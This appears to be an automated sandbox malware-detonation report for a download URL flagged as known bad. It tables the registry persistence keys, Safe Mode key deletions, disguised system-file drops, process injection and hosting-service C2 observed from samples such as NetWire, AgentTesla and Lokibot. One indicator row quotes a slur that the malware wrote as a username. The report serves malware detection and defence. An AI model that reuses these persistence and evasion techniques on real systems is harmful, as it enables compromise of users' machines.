Analysis Overview
Threat Level: Known bad
The file https://www.majorgeeks.com/files/details/microsoft_process_explorer.html was found to be: Known bad.
Malicious Activity Summary
ModiLoader, DBatLoader
Netwire
Modifies WinLogon for persistence
ModiLoader First Stage
Drops file in Drivers directory
Command and Scripting Interpreter: PowerShell
Sets service image path in registry
Downloads MZ/PE file
Obfuscated with Agile.Net obfuscator
Executes dropped EXE
Checks computer location settings
Loads dropped DLL
UPX packed file
Impair Defenses: Safe Mode Boot
Adds Run key to start application
Enumerates connected drives
Legitimate hosting services abused for malware hosting/C2
Modifies WinLogon
Abuse Elevation Control Mechanism: Bypass User Account Control
Blocklisted process makes network request
Drops file in System32 directory
Suspicious use of SetThreadContext
Subvert Trust Controls: Mark-of-the-Web Bypass
Drops file in Program Files directory
Drops file in Windows directory
Browser Information Discovery
Program crash
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Suspicious use of SetWindowsHookEx
NTFS ADS
Suspicious use of AdjustPrivilegeToken
Modifies Internet Explorer settings
Suspicious behavior: MapViewOfSection
Modifies registry class
Suspicious use of SendNotifyMessage
Suspicious behavior: GetForegroundWindowSpam
Modifies Internet Explorer start page
Suspicious behavior: EnumeratesProcesses
Modifies registry key
Suspicious behavior: LoadsDriver
Checks processor information in registry
Script User-Agent
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Enumerates system info in registry
Uses Task Scheduler COM API
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported: 2024-09-02 20:03
Signatures
Analysis: behavioral1
Detonation Overview
Submitted: 2024-09-02 20:03
Reported: 2024-09-02 20:21
Platform: win10v2004-20240802-en
Max time kernel: 1031s
Max time network: 1039s
Command Line
Signatures
ModiLoader, DBatLoader
Modifies WinLogon for persistence
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\system32\\userinit32.exe" | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
Netwire
ModiLoader First Stage
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File created | C:\Windows\SysWOW64\drivers\spoclsv.exe:Zone.Identifier:$DATA | C:\Users\Admin\Downloads\Gnil.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\drivers\spoclsv.exe | C:\Users\Admin\Downloads\Gnil.exe | N/A |
| File created | C:\Windows\SysWOW64\drivers\spoclsv.exe:Zone.Identifier:$DATA | C:\Users\Admin\Downloads\Gnil.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\drivers\spoclsv.exe | C:\Users\Admin\Downloads\Gnil.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\drivers\spoclsv.exe | C:\Users\Admin\Downloads\Gnil.exe | N/A |
| File created | C:\Windows\system32\Drivers\PROCEXP152.SYS | C:\Users\Admin\Downloads\ProcessExplorer\procexp64.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\drivers\spoclsv.exe | C:\Users\Admin\Downloads\Gnil.exe | N/A |
| File created | C:\Windows\SysWOW64\drivers\spoclsv.exe | C:\Users\Admin\Downloads\Gnil.exe | N/A |
| File created | C:\Windows\SysWOW64\drivers\spoclsv.exe:Zone.Identifier:$DATA | C:\Users\Admin\Downloads\Gnil.exe | N/A |
| File created | C:\Windows\SysWOW64\drivers\spoclsv.exe:Zone.Identifier:$DATA | C:\Users\Admin\Downloads\Gnil.exe | N/A |
Sets service image path in registry
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\PROCEXP152\ImagePath = "\\??\\C:\\Windows\\system32\\Drivers\\PROCEXP152.SYS" | C:\Users\Admin\Downloads\ProcessExplorer\procexp64.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key value queried | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\cmd.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Executes dropped EXE
Impair Defenses: Safe Mode Boot
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\iai2c.sys | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\CBDHSvc | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\UserManager | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\SerCx2.sys | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\ProfSvc | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\Power | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
Loads dropped DLL
Obfuscated with Agile.Net obfuscator
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Abuse Elevation Control Mechanism: Bypass User Account Control
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (str) | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Qspt = "C:\\Users\\Admin\\AppData\\Local\\Qspt\\Qspt.hta" | C:\Users\Admin\Desktop\NetWire.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\dllhost32 = "C:\\Windows\\system32\\dllhost32.exe" | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Qspt = "C:\\Users\\Admin\\AppData\\Local\\Qspt\\Qspt.hta" | C:\Users\Admin\Desktop\NetWire.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Qspt = "C:\\Users\\Admin\\AppData\\Local\\Qspt\\Qspt.hta" | C:\Users\Admin\Desktop\NetWire.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Qspt = "C:\\Users\\Admin\\AppData\\Local\\Qspt\\Qspt.hta" | C:\Users\Admin\Desktop\NetWire.exe | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\msiexec.exe | N/A |
Enumerates connected drives
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | camo.githubusercontent.com | N/A | N/A |
| N/A | camo.githubusercontent.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | camo.githubusercontent.com | N/A | N/A |
| N/A | camo.githubusercontent.com | N/A | N/A |
| N/A | camo.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | camo.githubusercontent.com | N/A | N/A |
| N/A | camo.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | camo.githubusercontent.com | N/A | N/A |
| N/A | camo.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Modifies WinLogon
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\DefaultUserName = "COCK_SUCKING_FAGGOT" | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\AltDefaultUserName = "COCK_SUCKING_FAGGOT" | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File created | C:\windows\SysWOW64\wuauclt.exe | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| File created | C:\windows\SysWOW64\chcp.exe | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| File created | C:\windows\SysWOW64\dumprep.exe | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| File created | C:\windows\SysWOW64\imapi.exe | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| File created | C:\Windows\SysWOW64\logon.exe:Zone.Identifier:$DATA | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| File created | C:\windows\SysWOW64\systray.exe | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| File created | C:\Windows\SysWOW64\userinit32.exe:Zone.Identifier:$DATA | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| File created | C:\windows\SysWOW64\ntkrnlpa.exe | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| File created | C:\Windows\SysWOW64\bootok.exe:Zone.Identifier:$DATA | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| File created | C:\windows\SysWOW64\ctfmon.exe | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| File created | C:\windows\SysWOW64\MDM.exe | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| File created | C:\Windows\SysWOW64\dllhost32.exe | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| File created | C:\windows\SysWOW64\alg.exe | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| File created | C:\windows\SysWOW64\ntoskrnl.exe | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| File created | C:\windows\SysWOW64\bootok.exe | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| File created | C:\Windows\SysWOW64\MDM.exe:Zone.Identifier:$DATA | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| File created | C:\windows\SysWOW64\services.exe | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| File created | C:\Windows\SysWOW64\dllhost32.exe:Zone.Identifier:$DATA | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| File created | C:\windows\SysWOW64\regedit.exe | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\userinit32.exe | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| File created | C:\Windows\SysWOW64\dumprep.exe:Zone.Identifier:$DATA | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| File created | C:\windows\SysWOW64\wowexec.exe | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| File created | C:\Windows\SysWOW64\wuauclt.exe:Zone.Identifier:$DATA | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\wntdll.pdb | C:\Users\Admin\Downloads\ProcessExplorer\procexp64.exe | N/A |
| File created | C:\Windows\SysWOW64\userinit32.exe | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| File created | C:\Windows\SysWOW64\services.exe:Zone.Identifier:$DATA | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| File created | C:\Windows\SysWOW64\win.exe:Zone.Identifier:$DATA | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| File created | C:\Windows\SysWOW64\progman.exe:Zone.Identifier:$DATA | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| File created | C:\windows\SysWOW64\chkntfs.exe | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| File created | C:\Windows\SysWOW64\alg.exe:Zone.Identifier:$DATA | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| File created | C:\Windows\SysWOW64\chcp.exe:Zone.Identifier:$DATA | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| File created | C:\Windows\SysWOW64\imapi.exe:Zone.Identifier:$DATA | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| File created | C:\Windows\SysWOW64\wowexec.exe:Zone.Identifier:$DATA | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| File created | C:\WINDOWS\SysWOW64\userinit.exe | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| File created | C:\windows\SysWOW64\progman.exe | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| File created | C:\windows\SysWOW64\shutdown.exe | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| File created | C:\Windows\SysWOW64\ntkrnlpa.exe:Zone.Identifier:$DATA | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| File created | C:\windows\SysWOW64\logon.exe | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| File created | C:\windows\SysWOW64\recover.exe | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| File created | C:\windows\SysWOW64\win.exe | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| File created | C:\Windows\SysWOW64\ntoskrnl.exe:Zone.Identifier:$DATA | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| File created | C:\windows\SysWOW64\autochk.exe | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| PID 6596 set thread context of 6328 | N/A | C:\Users\Admin\Desktop\NetWire.exe | C:\Program Files (x86)\internet explorer\ieinstal.exe |
| PID 5184 set thread context of 5896 | N/A | C:\Users\Admin\Desktop\NetWire.exe | C:\Program Files (x86)\internet explorer\ieinstal.exe |
| PID 5908 set thread context of 6400 | N/A | C:\Users\Admin\Desktop\NetWire.exe | C:\Program Files (x86)\internet explorer\ieinstal.exe |
| PID 6392 set thread context of 5812 | N/A | C:\Users\Admin\Downloads\Lokibot.exe | C:\Users\Admin\Downloads\Lokibot.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File created | C:\Program Files (x86)\Briano\UWPHook\MaterialDesignThemes.Wpf.xml | C:\Users\Admin\Desktop\AgentTesla.exe | N/A |
| File created | C:\Program Files (x86)\Briano\UWPHook\Microsoft.Management.Infrastructure.dll | C:\Users\Admin\Desktop\AgentTesla.exe | N/A |
| File created | C:\Program Files (x86)\Briano\UWPHook\System.Management.Automation.xml | C:\Users\Admin\Desktop\AgentTesla.exe | N/A |
| File created | C:\Program Files (x86)\Briano\UWPHook\UWPHook.exe.config | C:\Users\Admin\Desktop\AgentTesla.exe | N/A |
| File created | C:\Program Files (x86)\Briano\UWPHook\VDFParser.dll | C:\Users\Admin\Desktop\AgentTesla.exe | N/A |
| File created | C:\Program Files\Common Files\System\symsrv.dll | C:\Users\Admin\Downloads\Floxif.exe | N/A |
| File created | C:\Program Files (x86)\Briano\UWPHook\MaterialDesignThemes.Wpf.dll | C:\Users\Admin\Desktop\AgentTesla.exe | N/A |
| File created | C:\Program Files (x86)\Briano\UWPHook\SharpSteam.dll | C:\Users\Admin\Desktop\AgentTesla.exe | N/A |
| File created | C:\Program Files (x86)\Briano\UWPHook\System.Management.Automation.dll | C:\Users\Admin\Desktop\AgentTesla.exe | N/A |
| File created | C:\Program Files (x86)\Briano\UWPHook\UWPHook.exe | C:\Users\Admin\Desktop\AgentTesla.exe | N/A |
| File created | C:\Program Files (x86)\Briano\UWPHook\MaterialDesignColors.dll | C:\Users\Admin\Desktop\AgentTesla.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File created | C:\Windows\NOTEPAD.EXE | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
Subvert Trust Controls: Mark-of-the-Web Bypass
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File created | C:\Users\Admin\Downloads\Floxif.exe:Zone.Identifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| File created | C:\Users\Admin\Downloads\Lokibot.exe:Zone.Identifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| File created | C:\Users\Admin\Downloads\Fagot.a.exe:Zone.Identifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| File created | C:\Users\Admin\Downloads\AgentTesla.exe:Zone.Identifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| File created | C:\Users\Admin\Downloads\NetWire.exe:Zone.Identifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| File created | C:\Users\Admin\Downloads\MadMan.exe:Zone.Identifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| File created | C:\Users\Admin\Downloads\Mabezat.exe:Zone.Identifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| File created | C:\Users\Admin\Downloads\Gnil.exe:Zone.Identifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
Program crash
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\NetWire.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\Mabezat.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\Gnil.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\Lokibot.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\AgentTesla.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\NetWire.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\NetWire.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\Floxif.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\Gnil.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\Floxif.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\Gnil.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\Gnil.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\Floxif.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\Floxif.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\Floxif.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\AgentTesla.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\NetWire.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\Floxif.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\Floxif.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\Notepad.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\Floxif.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\Floxif.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\NetWire.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\NetWire.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\NetWire.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\Floxif.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\NetWire.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\Downloads\ProcessExplorer\procexp64.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Users\Admin\Downloads\ProcessExplorer\procexp64.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key deleted | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses\PCIBus\0000 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor\1 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor\0 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor\0 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
